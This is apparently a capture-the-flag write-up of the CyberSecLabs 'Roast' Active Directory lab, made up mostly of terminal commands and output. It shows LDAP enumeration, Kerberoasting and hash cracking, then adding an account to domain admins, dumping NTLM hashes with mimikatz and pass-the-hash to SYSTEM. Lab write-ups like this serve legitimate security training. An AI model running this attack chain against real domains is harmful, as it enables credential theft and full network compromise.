CyberSecLabs – Roast writeup
https://www.cyberseclabs.co.uk/labs/challenge-labs/all
As always we start with a nmap scan
kali@kali:/opt/evil-winrm$ nmap -Pn -vv -A 172.31.3.2 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-18 08:06 EDT NSE: Loaded 151 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 08:06 Completed NSE at 08:06, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 08:06 Completed NSE at 08:06, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 08:06 Completed NSE at 08:06, 0.00s elapsed Initiating Parallel DNS resolution of 1 host. at 08:06 Completed Parallel DNS resolution of 1 host. at 08:06, 0.00s elapsed Initiating Connect Scan at 08:06 Scanning 172.31.3.2 [1000 ports] Discovered open port 53/tcp on 172.31.3.2 Discovered open port 139/tcp on 172.31.3.2 Discovered open port 445/tcp on 172.31.3.2 Discovered open port 135/tcp on 172.31.3.2 Discovered open port 3389/tcp on 172.31.3.2 Discovered open port 636/tcp on 172.31.3.2 Discovered open port 3269/tcp on 172.31.3.2 Discovered open port 593/tcp on 172.31.3.2 Discovered open port 3268/tcp on 172.31.3.2 Discovered open port 464/tcp on 172.31.3.2 Discovered open port 88/tcp on 172.31.3.2 Discovered open port 389/tcp on 172.31.3.2 Completed Connect Scan at 08:06, 6.49s elapsed (1000 total ports) Initiating Service scan at 08:06
kali@kali:/opt$ nmap -Pn -sV --script "ldap* and not brute*" -p 389 172.31.3.2 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-17 08:51 EDT Nmap scan report for 172.31.3.2 Host is up (0.10s latency). PORT STATE SERVICE VERSION 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: roast.csl, Site: Default-First-Site-Name) | ldap-brute: | root:<empty> => Valid credentials | admin:<empty> => Valid credentials | administrator:<empty> => Valid credentials | webadmin:<empty> => Valid credentials | sysadmin:<empty> => Valid credentials | netadmin:<empty> => Valid credentials | guest:<empty> => Valid credentials | user:<empty> => Valid credentials | web:<empty> => Valid credentials |_ test:<empty> => Valid credentials | ldap-rootdse: | LDAP Results | <ROOT> | domainFunctionality: 7 | forestFunctionality: 7 | domainControllerFunctionality: 7 | rootDomainNamingContext: DC=roast,DC=csl | ldapServiceName: roast.csl:roast$@ROAST.CSL | isGlobalCatalogReady: TRUE | supportedSASLMechanisms: GSSAPI | supportedSASLMechanisms: GSS-SPNEGO | supportedSASLMechanisms: EXTERNAL | supportedSASLMechanisms: DIGEST-MD5 | supportedLDAPVersion: 3 | supportedLDAPVersion: 2 | supportedLDAPPolicies: MaxPoolThreads | supportedLDAPPolicies: MaxPercentDirSyncRequests | supportedLDAPPolicies: MaxDatagramRecv | supportedLDAPPolicies: MaxReceiveBuffer | supportedLDAPPolicies: InitRecvTimeout | supportedLDAPPolicies: MaxConnections | supportedLDAPPolicies: MaxConnIdleTime | supportedLDAPPolicies: MaxPageSize | supportedLDAPPolicies: MaxBatchReturnMessages | supportedLDAPPolicies: MaxQueryDuration | supportedLDAPPolicies: MaxDirSyncDuration | supportedLDAPPolicies: MaxTempTableSize | supportedLDAPPolicies: MaxResultSetSize | supportedLDAPPolicies: MinResultSets | supportedLDAPPolicies: MaxResultSetsPerConn | supportedLDAPPolicies: MaxNotificationPerConn | supportedLDAPPolicies: MaxValRange | supportedLDAPPolicies: MaxValRangeTransitive | supportedLDAPPolicies: ThreadMemoryLimit | supportedLDAPPolicies: SystemMemoryLimitPercent | supportedControl: 1.2.840.113556.1.4.319 | supportedControl: 1.2.840.113556.1.4.801 | supportedControl: 1.2.840.113556.1.4.473 | supportedControl: 1.2.840.113556.1.4.528 | supportedControl: 1.2.840.113556.1.4.417 | supportedControl: 1.2.840.113556.1.4.619 | supportedControl: 1.2.840.113556.1.4.841 | supportedControl: 1.2.840.113556.1.4.529 | supportedControl: 1.2.840.113556.1.4.805 | supportedControl: 1.2.840.113556.1.4.521 | supportedControl: 1.2.840.113556.1.4.970 | supportedControl: 1.2.840.113556.1.4.1338 | supportedControl: 1.2.840.113556.1.4.474 | supportedControl: 1.2.840.113556.1.4.1339 | supportedControl: 1.2.840.113556.1.4.1340 | supportedControl: 1.2.840.113556.1.4.1413 | supportedControl: 2.16.840.1.113730.3.4.9 | supportedControl: 2.16.840.1.113730.3.4.10 | supportedControl: 1.2.840.113556.1.4.1504 | supportedControl: 1.2.840.113556.1.4.1852 | supportedControl: 1.2.840.113556.1.4.802 | supportedControl: 1.2.840.113556.1.4.1907 | supportedControl: 1.2.840.113556.1.4.1948 | supportedControl: 1.2.840.113556.1.4.1974 | supportedControl: 1.2.840.113556.1.4.1341 | supportedControl: 1.2.840.113556.1.4.2026 | supportedControl: 1.2.840.113556.1.4.2064 | supportedControl: 1.2.840.113556.1.4.2065 | supportedControl: 1.2.840.113556.1.4.2066 | supportedControl: 1.2.840.113556.1.4.2090 | supportedControl: 1.2.840.113556.1.4.2205 | supportedControl: 1.2.840.113556.1.4.2204 | supportedControl: 1.2.840.113556.1.4.2206 | supportedControl: 1.2.840.113556.1.4.2211 | supportedControl: 1.2.840.113556.1.4.2239 | supportedControl: 1.2.840.113556.1.4.2255 | supportedControl: 1.2.840.113556.1.4.2256 | supportedControl: 1.2.840.113556.1.4.2309 | supportedControl: 1.2.840.113556.1.4.2330 | supportedControl: 1.2.840.113556.1.4.2354 | supportedCapabilities: 1.2.840.113556.1.4.800 | supportedCapabilities: 1.2.840.113556.1.4.1670 | supportedCapabilities: 1.2.840.113556.1.4.1791 | supportedCapabilities: 1.2.840.113556.1.4.1935 | supportedCapabilities: 1.2.840.113556.1.4.2080 | supportedCapabilities: 1.2.840.113556.1.4.2237 | subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=roast,DC=csl | serverName: CN=ROAST,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=roast,DC=csl | schemaNamingContext: CN=Schema,CN=Configuration,DC=roast,DC=csl | namingContexts: DC=roast,DC=csl | namingContexts: CN=Configuration,DC=roast,DC=csl | namingContexts: CN=Schema,CN=Configuration,DC=roast,DC=csl | namingContexts: DC=DomainDnsZones,DC=roast,DC=csl | namingContexts: DC=ForestDnsZones,DC=roast,DC=csl | isSynchronized: TRUE | highestCommittedUSN: 86066 | dsServiceName: CN=NTDS Settings,CN=ROAST,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=roast,DC=csl | dnsHostName: Roast.roast.csl | defaultNamingContext: DC=roast,DC=csl | currentTime: 20200817125113.0Z |_ configurationNamingContext: CN=Configuration,DC=roast,DC=csl | ldap-search: | Context: DC=roast,DC=csl | dn: DC=roast,DC=csl | dn: CN=David Smith,OU=Roast,DC=roast,DC=csl | objectClass: top | objectClass: person | objectClass: organizationalPerson | objectClass: user | cn: David Smith | sn: Smith | description: Your Password is WelcomeToR04st | givenName: David | distinguishedName: CN=David Smith,OU=Roast,DC=roast,DC=csl | instanceType: 4 | whenCreated: 2020/05/15 06:30:43 UTC | whenChanged: 2020/05/15 21:42:47 UTC | displayName: David Smith | uSNCreated: 16572 | uSNChanged: 32799 | name: David Smith | objectGUID: 95a9772-f36-7344-9cc1-53d257cf635e | userAccountControl: 66048 | badPwdCount: 0 | codePage: 0 | countryCode: 0 | badPasswordTime: 2020-05-16T01:47:26+00:00 | lastLogoff: 0 | lastLogon: 2020-05-18T02:48:58+00:00 | logonHours: \xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF | pwdLastSet: 2020-05-16T01:46:13+00:00 | primaryGroupID: 513 | objectSid: 1-5-21-4133422454-1522376082-951199702-1103 | accountExpires: Never | logonCount: 1 | sAMAccountName: dsmith | sAMAccountType: 805306368 | userPrincipalName: dsmith@roast.csl | objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=roast,DC=csl | dSCorePropagationData: 2020/05/15 06:46:18 UTC | dSCorePropagationData: 2020/05/15 06:38:02 UTC | dSCorePropagationData: 1601/01/01 00:00:00 UTC | lastLogonTimestamp: 2020-05-16T01:48:13+00:00 | dn: CN=Cody Rhodes,OU=Roast,DC=roast,DC=csl | objectClass: top | objectClass: person | objectClass: organizationalPerson | objectClass: user | cn: Cody Rhodes | sn: Rhodes | givenName: Cody | distinguishedName: CN=Cody Rhodes,OU=Roast,DC=roast,DC=csl | instanceType: 4 | whenCreated: 2020/05/15 06:34:11 UTC | whenChanged: 2020/05/15 21:41:51 UTC | displayName: Cody Rhodes | uSNCreated: 16605 | memberOf: CN=Remote Management Users,CN=Builtin,DC=roast,DC=csl | uSNChanged: 32794 | name: Cody Rhodes | objectGUID: 264ab96b-32e6-7f47-9f71-45b9eae6ee8 | userAccountControl: 66048 | badPwdCount: 0 | codePage: 0 | countryCode: 0 | badPasswordTime: 2020-05-16T01:47:26+00:00 | lastLogoff: 0 | lastLogon: 2020-05-16T01:58:03+00:00 | logonHours: \xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF | pwdLastSet: 2020-05-16T01:47:17+00:00 | primaryGroupID: 513 | objectSid: 1-5-21-4133422454-1522376082-951199702-1104 | accountExpires: Never | logonCount: 2 | sAMAccountName: crhodes | sAMAccountType: 805306368 | userPrincipalName: crhodes@roast.csl | objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=roast,DC=csl | dSCorePropagationData: 2020/05/15 06:46:18 UTC | dSCorePropagationData: 2020/05/15 06:37:46 UTC | dSCorePropagationData: 1601/01/01 00:00:00 UTC | lastLogonTimestamp: 2020-05-15T10:54:23+00:00 | dn: CN=Steve Smith,OU=Roast,DC=roast,DC=csl | objectClass: top | objectClass: person | objectClass: organizationalPerson | objectClass: user | cn: Steve Smith | sn: Smith | givenName: Steve | distinguishedName: CN=Steve Smith,OU=Roast,DC=roast,DC=csl | instanceType: 4 | whenCreated: 2020/05/15 06:35:06 UTC | whenChanged: 2020/05/15 06:38:17 UTC | displayName: Steve Smith | uSNCreated: 16612 | uSNChanged: 16629 | name: Steve Smith | objectGUID: 66dc74ae-c214-4e42-94e3-44092523e22 | userAccountControl: 66048 | badPwdCount: 2 | codePage: 0 | countryCode: 0 | badPasswordTime: 2020-05-16T01:47:26+00:00 | lastLogoff: 0 | lastLogon: Never | pwdLastSet: 2020-05-15T10:40:32+00:00 | primaryGroupID: 513 | objectSid: 1-5-21-4133422454-1522376082-951199702-1105 | accountExpires: 30828-09-14T06:53:31+00:00 | logonCount: 0 | sAMAccountName: ssmith | sAMAccountType: 805306368 | userPrincipalName: ssmith@roast.csl | objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=roast,DC=csl | dSCorePropagationData: 2020/05/15 06:46:18 UTC | dSCorePropagationData: 2020/05/15 06:38:17 UTC | dSCorePropagationData: 1601/01/01 00:00:00 UTC |_ dn: CN=Roast Svc,OU=Roast,DC=roast,DC=csl Service Info: Host: ROAST; OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 10.48 seconds kali@kali:/opt$
We make sure we have the latest impacket installed
kali@kali:/opt$ sudo git-clone https://github.com/SecureAuthCorp/impacket.git sudo: git-clone: command not found kali@kali:/opt$ sudo git clone https://github.com/SecureAuthCorp/impacket.git Cloning into 'impacket'... remote: Enumerating objects: 18128, done. remote: Total 18128 (delta 0), reused 0 (delta 0), pack-reused 18128 Receiving objects: 100% (18128/18128), 5.97 MiB | 4.64 MiB/s, done. Resolving deltas: 100% (13833/13833), done. kali@kali:/opt$ cd impacket/ kali@kali:/opt/impacket$ pip3 install .
.
kali@kali:/opt/impacket$ crackmapexec smb 172.31.3.2 -u dsmith -p WelcomeToR04st SMB 172.31.3.2 445 ROAST [*] Windows 10.0 Build 17763 (name:ROAST) (domain:roast.csl) (signing:True) (SMBv1:False) SMB 172.31.3.2 445 ROAST [+] roast.csl\dsmith:WelcomeToR04st
kali@kali:/opt/evil-winrm$ crackmapexec smb 172.31.3.2 -u dsmith -p WelcomeToR04st --shares SMB 172.31.3.2 445 ROAST [*] Windows 10.0 Build 17763 (name:ROAST) (domain:roast.csl) (signing:True) (SMBv1:False) SMB 172.31.3.2 445 ROAST [+] roast.csl\dsmith:WelcomeToR04st SMB 172.31.3.2 445 ROAST [+] Enumerated shares SMB 172.31.3.2 445 ROAST Share Permissions Remark SMB 172.31.3.2 445 ROAST ----- ----------- ------ SMB 172.31.3.2 445 ROAST ADMIN$ Remote Admin SMB 172.31.3.2 445 ROAST C$ Default share SMB 172.31.3.2 445 ROAST IPC$ READ Remote IPC SMB 172.31.3.2 445 ROAST NETLOGON READ Logon server share SMB 172.31.3.2 445 ROAST SYSVOL READ Logon server share kali@kali:/opt/evil-winrm$
kali@kali:/opt/impacket$ crackmapexec winrm 172.31.3.2 -u dsmith -p WelcomeToR04st WINRM 172.31.3.2 5985 ROAST [*] http://172.31.3.2:5985/wsman WINRM 172.31.3.2 5985 ROAST [-] ROAST0\dsmith:WelcomeToR04st "Failed to authenticate the user dsmith with ntlm"
kali@kali:/tmp$ GetUserSPNs.py -request -dc-ip 172.31.3.2 roast.csl/crhodes -outputfile hashes.kerberoast Impacket v0.9.22.dev1+20200813.221956.1c893884 - Copyright 2020 SecureAuth Corporation Password:WelcomeToR04st ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation -------------------- -------- ----------------------------------------------------- -------------------------- --------- ---------- roast/ROAST roastsvc CN=Remote Management Users,CN=Builtin,DC=roast,DC=csl 2020-05-15 02:35:50.302845 <never>
kali@kali:/tmp$ cat hashes.kerberoast $krb5tgs$23$*roastsvc$ROAST.CSL$roast/ROAST*$a06f00e18dbcc60631026290cd49c8c8$e208b8bb3a69789d214c8901dca6502f2f4136ffa72a47e15c7b3ae887f7494a7b4a2850f1dc51c40b40ac503dbe6c9f6008970a61472611e899705dfbc9c7155f48d129a838264ab8a8a271ee2c5ccd7dab4928e37f12fa8b5e3d6539e4267774b2ce663cdaa8098155c027a6a991cf9b3c3372058da235589a6f1a28b0fcbd3fe715815439efc9979c1cc0bd1cf23f9eb3b9664613f34c91cc18f5325b575586f8b5ab03331bd95bf705e26ba40f0405a4524bc084d6c54c0283a3ddadacac71fe1a3793f7f8592f6f8bf1bddd74859e4c55635dd65419a4e944821696f7437b95f3622a1aeb3dc479b9d1ae73f61590c4b4db1ddff44d1674021a0a86518fafd937a28a43ef017af965322dd0ec2f32a59f7ec699ca2457663c9e82d76c2446363902d27598fa5ba591734d7eaba9e16d599558025244eb68854e94ef3a05bae3e4deaeaf757a7ef567e3824a8b49a40f7b4bb34b5f5bc43956e67726f55dd16a2bbbc70109e059e9f049393e20f36bda7ceb2a7c33dc563583f2447d75b1abdbb2bfb9dcf6cc045b31d93c8c7fdb3cd4f6eabe3cab80c9943c9e6bfdc0c18ff7abc93b9a5239116ff6f81b9edf2ef42b164bb6c27edf0916437f9bbe3452f634324aa4e6ff934658e6acd04b711259dd9e91d82775f79b143047b694d4cf9ba997c39f176aebe259825916494662e1e2b0a2b0eb7d208d4b9dd288d40d60823234fa686941de759bb48c71f768f025447c52fe37e7132c47f5b71ea9d474cc9a1fd892d2ad510eb0446a5354cd785f6770b1c0e4e76af40c2c37f1cc7ea579c421ede4ecf63d640f39763eaa2557ad904d43d9008169563d05870e9488a2b1e6d6c50c755440f3a4c477aebfad5e401ef6684be7ddba7857d271b45e69dc3992807efb68aa44afefe003481121d004b4cda9c4d5b77d72c7018698bd10d9b3be762f2c0a21e424a75a40967b46dcad23862c9b76ccea70fa28260d6e86c2489b58e97bfa61d6ad4a3cca99c296ca3bef63963ca29db7658690ba9587f060868132a291065b4b3abca17c1f50260eb6dcf82a0994d584626c4358e2f81c28382e1a1310fc36c88a4f7e6c809035e3b2427f6a202c55294f261023f2ef25f05721c2c3e307ccd1dd7496e2fa9720fa35ddbdf752a21b16871367960c130538278731484cef2b8d37aec73ebf38da421a1fe96626132b42dc072e80236dbf9396f40af9a20622de811529ab3b54deeb1af3d974c77ea4eadfa5ac6b9f7eb2d0782edd5ffd706e760869e11d4c1b2540f2d7f74f7f3bbc3a65 kali@kali:/tmp$
kali@kali:/tmp$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes.kerberoast
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
!!!watermelon245 (?)
1g 0:00:00:25 DONE (2020-08-18 05:25) 0.03957g/s 567616p/s 567616c/s 567616C/s !!12Honey.. 0860776252
Use the "--show" option to display all of the cracked passwords reliably
Session completed
kali@kali:/tmp$
kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i 172.31.3.2 -u roastsvc -p '!!!watermelon245' Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\roastsvc\Documents>
kali@kali:/opt/evil-winrm$ crackmapexec winrm 172.31.3.2 -u crhodes -p WelcomeToR04st WINRM 172.31.3.2 5985 ROAST [*] http://172.31.3.2:5985/wsman WINRM 172.31.3.2 5985 ROAST [+] ROAST0\crhodes:WelcomeToR04st (Pwn3d!) kali@kali:/opt/evil-winrm$
kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i 172.31.3.2 -u crhodes -p 'WelcomeToR04st' Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\crhodes\Documents> cd c:\puck *Evil-WinRM* PS C:\puck> upload /opt/Bloodhound/Ingestors/Sharphound.exe Info: Uploading /opt/Bloodhound/Ingestors/Sharphound.exe to C:\puck\Sharphound.exe Data: 1110016 bytes of 1110016 bytes copied Info: Upload successful! *Evil-WinRM* PS C:\puck> upload /opt/Bloodhound/Ingestors/Sharphound.ps1 Info: Uploading /opt/Bloodhound/Ingestors/Sharphound.ps1 to C:\puck\Sharphound.ps1 Data: 1297764 bytes of 1297764 bytes copied Info: Upload successful! *Evil-WinRM* PS C:\puck> dir Directory: C:\puck Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 8/18/2020 3:42 AM 832512 Sharphound.exe -a---- 8/18/2020 3:42 AM 973323 Sharphound.ps1 *Evil-WinRM* PS C:\puck> ./Sharphound.exe ----------------------------------------------- Initializing SharpHound at 3:42 AM on 8/18/2020 ----------------------------------------------- Resolved Collection Methods: Group, Sessions, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container [+] Creating Schema map for domain ROAST.CSL using path CN=Schema,CN=Configuration,DC=ROAST,DC=CSL [+] Cache File not Found: 0 Objects in cache [+] Pre-populating Domain Controller SIDS Status: 0 objects finished (+0) -- Using 19 MB RAM Status: 61 objects finished (+61 61)/s -- Using 26 MB RAM Enumeration finished in 00:00:01.8335102 Compressing data to .\20200818034254_BloodHound.zip You can upload this file directly to the UI SharpHound Enumeration Completed at 3:42 AM on 8/18/2020! Happy Graphing! *Evil-WinRM* PS C:\puck> dir Directory: C:\puck Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 8/18/2020 3:42 AM 8935 20200818034254_BloodHound.zip -a---- 8/18/2020 3:42 AM 832512 Sharphound.exe -a---- 8/18/2020 3:42 AM 973323 Sharphound.ps1 -a---- 8/18/2020 3:42 AM 10118 ZDU2MDE4M2MtOTJlZC00MTRlLWFhMmEtOGJlM2E2ODA4ZjUy.bin *Evil-WinRM* PS C:\puck>
*Evil-WinRM* PS C:\puck> download 20200819234325_BloodHound.zip /tmp/20200819234325_BloodHound.zip Info: Downloading C:\puck\20200819234325_BloodHound.zip to /tmp/20200819234325_BloodHound.zip Info: Download successful! *Evil-WinRM* PS C:\puck>
net group “domain admins” roastsvc /add
*Evil-WinRM* PS C:\users\roastsvc\Documents> ./mimikatz.exe "privilege:debug" "lsadump::lsa /patch" "exit" .#####. mimikatz 2.2.0 (x64) #18362 May 2 2020 16:23:51 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ mimikatz(commandline) # privilege:debug ERROR mimikatz_doLocal ; "privilege:debug" command of "standard" module not found ! Module : standard Full name : Standard module Description : Basic commands (does not require module name) exit - Quit mimikatz cls - Clear screen (doesn't work with redirections, like PsExec) answer - Answer to the Ultimate Question of Life, the Universe, and Everything coffee - Please, make me a coffee! sleep - Sleep an amount of milliseconds log - Log mimikatz input/output to file base64 - Switch file input/output base64 version - Display some version informations cd - Change or display current directory localtime - Displays system local date and time (OJ command) hostname - Displays system local hostname mimikatz(commandline) # lsadump::lsa /patch Domain : ROAST0 / S-1-5-21-4133422454-1522376082-951199702 RID : 000001f4 (500) User : Administrator LM : NTLM : f6861a8cfc1c3b9f3ff39a8adb6bd388 RID : 000001f5 (501) User : Guest LM : NTLM : RID : 000001f6 (502) User : krbtgt LM : NTLM : 016e928748d559770ee5fe3028baf718 RID : 0000044f (1103) User : dsmith LM : NTLM : a0a8160111b21d48d2e816f4cc8da053 RID : 00000450 (1104) User : crhodes LM : NTLM : a0a8160111b21d48d2e816f4cc8da053 RID : 00000451 (1105) User : ssmith LM : NTLM : 23991f3cd665b0bc1f7cccfd62506161 RID : 00000452 (1106) User : roastsvc LM : NTLM : 2f77331cfd7b2142b3a86a7d2ce7e824 RID : 000003e8 (1000) User : ROAST$ LM : NTLM : 0db85ab8c8395c6c1333a4e9e90ae400 mimikatz(commandline) # exit Bye! *Evil-WinRM* PS C:\users\roastsvc\Documents>
kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i 172.31.3.2 -u Administrator -H f6861a8cfc1c3b9f3ff39a8adb6bd388 Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents>
.
kali@kali:/opt/evil-winrm$ psexec.py -hashes f6861a8cfc1c3b9f3ff39a8adb6bd388:f6861a8cfc1c3b9f3ff39a8adb6bd388 administrator@172.31.3.2 Impacket v0.9.22.dev1+20200813.221956.1c893884 - Copyright 2020 SecureAuth Corporation [*] Requesting shares on 172.31.3.2..... [*] Found writable share ADMIN$ [*] Uploading file EqimrmMk.exe [*] Opening SVCManager on 172.31.3.2..... [*] Creating service Plxk on 172.31.3.2..... [*] Starting service Plxk..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.17763.737] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami nt authority\system C:\Windows\system32>hostname Roast C:\Windows\system32>
.
kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i 172.31.3.2 -u Administrator -H f6861a8cfc1c3b9f3ff39a8adb6bd388 Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> hostname Roast *Evil-WinRM* PS C:\Users\Administrator\Documents> *Evil-WinRM* PS C:\Users\Administrator\desktop> type system.txt.txt 9d91f887b78d82444a5af8bbd0d115db *Evil-WinRM* PS C:\Users\Get-ChildItem -Path C:\Users -Filter *.txt.txt -Recurse -ErrorAction SilentlyContinue -Force
*Evil-WinRM* PS C:\Users\Administrator\desktop> type system.txt.txt 9d91f887b78d82444a5af8bbd0d115db *Evil-WinRM* PS C:\Users> type C:\Users\roastsvc\Desktop\access.txt 0042894e0a6b2bc2c4517c5f7ccc5c16
.
https://m.twitch.tv/videos/708116376
Author : Puckiestyle